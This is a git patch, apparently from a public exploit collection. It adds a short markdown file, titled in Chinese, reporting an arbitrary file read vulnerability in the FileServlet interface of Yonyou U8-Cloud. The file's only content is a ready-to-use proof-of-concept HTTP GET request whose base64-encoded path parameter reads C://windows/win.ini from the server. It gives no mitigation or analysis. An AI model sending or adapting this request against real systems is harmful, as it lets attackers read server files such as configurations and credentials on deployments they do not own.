From 0a2c1277085973b521f2d0da895286e04600c8a6 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 28 Mar 2024 19:23:42 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BU8-Cloud=E6=8E=A5?= =?UTF-8?q?=E5=8F=A3FileServlet=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F?= =?UTF-8?q?=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md diff --git a/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md b/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..f9505bf --- /dev/null +++ b/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md @@ -0,0 +1,9 @@ +## 用友U8-Cloud接口FileServlet存在任意文件读取漏洞 + + +## poc +``` +GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1 +Host: url + +```